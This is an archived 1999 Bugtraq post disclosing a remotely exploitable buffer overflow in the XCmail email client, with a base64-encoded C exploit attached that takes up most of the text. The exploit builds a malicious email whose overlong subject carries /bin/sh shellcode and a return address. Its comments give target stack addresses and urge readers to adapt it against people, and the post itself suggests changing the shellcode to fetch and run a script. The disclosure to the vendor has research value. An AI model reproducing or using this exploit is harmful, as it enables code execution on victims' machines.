Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

[0z0n3] XCmail remotely exploitable vulnerability

From: pierric () ADMIN LINUX ORG (Arthur)
Date: Tue, 2 Mar 1999 00:41:21 +0100

  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to mime () docserver cac washington edu for more info.

---1228522812-218270008-920331681=:1136
Content-Type: TEXT/PLAIN; charset=US-ASCII

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I have found a vulnerability in xcmail that is exploitable,
a simple buffer overflow vulnerability.

The bug appears when replying to a message with a long subject line, and
only when autoquote is on (dunno why... i didn't have time to read the
sources, and I'm so lazy) ....

the exploit is trivial, but as the buffer is not very large you have to do
very precise return address calculation, and i believe it IS remotely
exploitable, but you have to know a lot about the machine you want to gain
acces to... so this definitely won't be useful to script kiddies
(rootshell.com folks: don't waste your time ;)

maybe one could upload a script by ftp, and modify the shellcode so that
it copies the file to /tmp, chmod()s it and executes it...

sample exploit attached.

THE AUTHORS HAVE BEEN NOTIFIED, and they responded quickly.

- --
[ WWW  page ]  http://www.multimania.com/xsfx/
[ PGP  key  ]  http://www.multimania.com/xsfx/files/XSFX.key
      -
[ IRC       ]  EFnet / IRCnet
[ ICQ #     ]  26995402

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQA/AwUBNtslrnzELLdog5QhEQJbXgCffU7u/2JaO8nVtn7gCwphp5Ta3w4An3Cn
2IryEigG2+De4zaiVF6XWsN+
=lKAd
-----END PGP SIGNATURE-----

---1228522812-218270008-920331681=:1136
Content-Type: TEXT/PLAIN; charset=X-UNKNOWN; name="xcmail_exp.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.04.9903020041210.1136 () admin linux org>
Content-Description:
Content-Disposition: attachment; filename="xcmail_exp.c"

DQovKiAJCQkJCQkJCTI3LzAyLzE5OTkgDQogICAgZXhwbG9pdCBieSBYU0ZY
QGluYW1lLmNvbS4uLi4gdGhpcyBidWcgaXMgbm90IGV4cGxvaXRhYmxlIGlu
IGFueQkNCiAgICBoYXJtZnVsIHdheSwgYXQgbGVhc3Qgbm90IGVhc2lseSA6
KQkJCQkJDQogCQkJCQkJCQkJDQogCXRoaXMgb25seSB3b3JrcyBpZiB0YXJn
ZXQgeGMtbWFpbCBoYXMgZW5hYmxlZAkJCQ0KIAknQXV0b3F1b3RlJyAoUHJl
ZmVyZW5jZXMgbWVudSAtPiBRdW90ZSAtPiBBdXRvcXVvdGUpIAkJDQoNCg0K
ICAgR2l2ZW4gRVNQIHZhbHVlcyBhcmUgZm9yIA0KICAgIA0KICAgID4+Pj4g
Z2xpYmMyIDAuOTkuNiBkeW5hbWljYWxseSBsaW5rZWQgb2ZmaWNpYWwgYmlu
YXJ5IDw8PDwNCg0KICAgIG9ubHkgd2hlbiB1c2VycyBjbGlja3MgJ3JlcGx5
JyBpbiB0aGUgbWVzc2FnZSBsaXN0IHdpbmRvdywNCiAgICBOT1Qgd2hlbiBy
ZWFkaW5nIG1lc3NhZ2UgYW5kIGNsaWNraW5nICdyZXBseScuLi4NCiANCiAg
ICBub3RlOiBmaW5kIHlvdXIgb3duIGFkcmVzc2VzIGlmIHlvdSB3YW50IHRv
IGZ1Y2sgcGVvcGxlIG92ZXIsIGFuZCBnZXQNCgkgIGFuIGV2aWwgc2hlbGxj
b2RlIDopIGFuZCByZW1lbWJlciwgdGhlIGJ1ZmZlciBpcyB2ZXJ5IHNtYWxs
Li4uDQoNCgkweGJmZmZmMTQwIGluIEV0ZXJtIGxhdW5jaGVkIGZyb20gV01h
a2VyIA0KCTB4YmZmZmU5ZjkgaW4geHRlcm0gbGF1bmNoZWQgZnJvbSBFdGVy
bS4uLiANCgkweGJmZmZlYjEwIGFzIHJvb3QsIGluIHh0ZXJtLCBmcm9tIHhp
bml0cmMgCQkNCgkJCQkJCQkJCSovDQoNCiNpbmNsdWRlIDxzdGRpby5oPg0K
DQojaWZuZGVmIEVTUA0KI2RlZmluZQlFU1AJMHhiZmZmZjE0MAkNCiNlbmRp
Zg0KDQojaWZuZGVmIE5PUA0KI2RlZmluZSBOT1AgCSdBJwkvKiB0aGlzIHdp
bGwgYXBwZWFyIGluIHN1YmplY3Qgb2YgZXZpbCBtZXNzYWdlICovDQojZW5k
aWYJCQkvKiBzbyBtYXliZSBOT1AgKDB4OTApIGlzIGEgYmV0dGVyIGNob2lj
ZS4uLg0KDQoJCQkgICBidXQgJ0EncyBhcmUgZWFzaWVyIHRvIHNwb3Qgd2hl
biBicm93c2luZyB0aHJ1DQoJCQkgICBtZW1vcnkgdG8gZmluZCBidWZmZXIg
YWRyZXNzIDopICovDQoJCQkNCmNoYXIgc2hlbGxjb2RlW10gPSAJIlx4ODlc
eGUxXHgzMVx4YzBceDUwXHg4ZFx4NWNceDI0XHhmOVx4ODMiDQoJCQkiXHhj
NFx4MGNceDUwXHg1M1x4ODlceGNhXHhiMFx4MGJceGNkXHg4MCINCgkJCSIv
YmluL3NoIjsNCgkNCgkvKiBTaGVsbGNvZGUgZnJvbSBXaWxseSBUYXJyZWF1
ICgyMCBieXRlcykgKi8NCg0KLyogc3RhdGljIGlubGluZSBnZXRlc3AoKSB7
DQogKiAgX19hc21fXygiIG1vdmwgJWVzcCwlZWF4ICIpOw0KICogfSAqLw0K
ICANCm1haW4oaW50IGFyZ2MsIGNoYXIgKiphcmd2KQ0Kew0KCWxvbmcgdW5z
aWduZWQgZXNwOw0KCWludCBpLG5vcHM9MDsgDQoNCglwcmludGYoIkZyb20g
cG9wM0AxOTIuMTM0LjE5Mi4xMTIgV2VkIERlYyAgMiAxOToyNzo1NyAxOTk4
XG4iKTsNCglwcmludGYoIkRhdGU6IFdlZCwgMjUgRGVjIDE5OTggMDA6MDA6
MDAgKzAwMDBcbiIpOw0KCXByaW50ZigiRnJvbTogMHowbjMgPGZyaWVuZEBs
b2NhbGhvc3Q+XG4iKTsNCgkNCglwcmludGYoIlN1YmplY3Q6ICIpOw0KDQoJ
Zm9yIChpPTA7aTwoMjA0IC0gc3RybGVuKHNoZWxsY29kZSkpO2krKykgDQoJ
ew0KCQlwdXRjaGFyKE5PUCk7DQoJCW5vcHMrKzsNCgl9DQoJDQoJcHJpbnRm
KHNoZWxsY29kZSk7DQoJDQovKgllc3AgPSBnZXRlc3AoKTsJCSovDQoJZXNw
ID0gRVNQOw0KCQ0KCWZwcmludGYoc3RkZXJyLCAic2FtcGxlIGV4cGxvaXQg
YnkgWFNGWEBpbmFtZS5jb21cbiINCgkJCSJERUJVRzogJWQgTk9Qc1xuIg0K
CQkJIkRFQlVHOiB1c2luZyAlI3ggKGdldGVzcCgpJStkKSBhcyBzaGVsbGNv
ZGUgYWRkcmVzc1xuIiwNCgkJCW5vcHMsZXNwLGVzcC1nZXRlc3AoKSk7DQoJ
DQoJZndyaXRlKCZlc3AsNCwxLHN0ZG91dCk7DQoJcHV0YygnXG4nLHN0ZG91
dCk7DQoJDQoJcHJpbnRmKCJNZXNzYWdlLUlkOiA8MTk5ODEyMDIxODI3LlRB
QTIzMTEyQDAwMy5keW4ubWwub3JnPlxuIik7DQoJcHJpbnRmKCJUbzogXCJk
ZWFyIHVzZXJcIiA8eW91QGRvbWFpbi5jb20+XG4iKTsNCglwcmludGYoIlxu
Iik7DQoJcHJpbnRmKCJoZWxsbyAhIHBsZWFzZSByZXBseSwgaSdtIG5vdCBz
dXJlIG15IGVtYWlsIGJveCBpcyBvayA6KFxuIik7DQoJcHJpbnRmKCJcbiIp
Ow0KfQ0KDQovKiAgR3JlZXRpbmdzOiB0byBKZXJvbWVfLCBEdW5rYWhuLCBs
aW9uZWwgZG91eCwgbmlhcmsgZG91eCwgDQogICAga2V2aW4gbWl0bmljayBs
J2FtaXMgZGVzIGtvYWxhcyBoZXJnb3Ro6XJhcGV1dGVzIGFuZCB0bw0KICAg
IG15IGNhbm5hYmlzIHNlZWRzIHdoaWNoIGFyZSBncm93aW5nIG9uIHRoZWly
IG93biB3aGlsZSBJJ20gY29kaW5nIDopIA0KICAgIGFuZCB0byBhbGwgdGhl
IEFtaWRvdXggaW4gdGhlIHdvcmxkLg0KICAgIFBlYWNlIDopCQkJCQkJCQkN
CiAgICANCiAgICBub3RlIHRoYXQgdGhpcyBleHBsb2l0IGlzIG5vdCB2ZXJ5
IHVzYWJsZSBhcy1pcywgY2F1c2UgeGMtbWFpbCBpcyBub3QNCiAgICBzdWlk
IHJvb3QuLi4gYnV0IGlmIHlvdSwgazFkMTEzLCBmaW5kIGEgd2F5IHRvIGdl
dCBhIHJlbW90ZSB4dGVybSA6KQ0KICAgIGdvb2QgbHVjayA6KQ0KICAgIAkJ
CQkJCQkJCSovDQo=
---1228522812-218270008-920331681=:1136--
Previous By Date Next
Previous By Thread Next

Current thread: